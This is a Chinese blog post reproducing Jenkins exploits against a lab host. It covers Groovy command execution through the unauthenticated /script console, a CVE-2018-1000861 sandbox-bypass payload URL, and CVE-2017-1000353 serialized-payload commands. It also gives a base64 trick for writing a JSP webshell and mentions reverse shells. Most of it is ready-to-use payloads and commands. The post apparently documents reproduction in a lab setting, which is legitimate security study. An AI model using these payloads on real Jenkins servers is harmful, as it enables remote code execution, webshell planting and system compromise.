Jenkins漏洞利用复现

一、未授权访问

访问url:

http://172.16.20.134:8080/script

 

 

 

命令执行

println "ls -al".execute().text

也可以利用powershell 或者python脚本反弹shell

 

 

 

二、CVE-2018-1000861 远程命令执行漏洞

payload:

securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript
?sandbox=true
&value=public class x {
  public x(){
    "touch /tmp/success".execute()
  }
}

  

 

&value=转成url编码

发送get请求:

 

python脚本:

https://github.com/orangetw/awesome-jenkins-rce-2019/blob/master/exp.py

  

 

三、CVE-2017-1000353 远程代码执行

工具地址:https://github.com/vulhub/CVE-2017-1000353

 https://ssd-disclosure.com/archives/3171

# 生成ser
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar 1.ser "touch /tmp/1.jsp"

# 发送ser
python exploit.py http://172.16.20.134:8080 1.ser

 

exploit.py这里要注释下,如果你使用代理的话可以添加,这里只是复现,用不到

 另外一个linux写shell的小技巧:

echo base64后的木马内容 |base64 -d > 1.jsp

 

jsp生成成功

 

 

四、

 

转载于:https://www.cnblogs.com/junsec/p/11593556.html

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值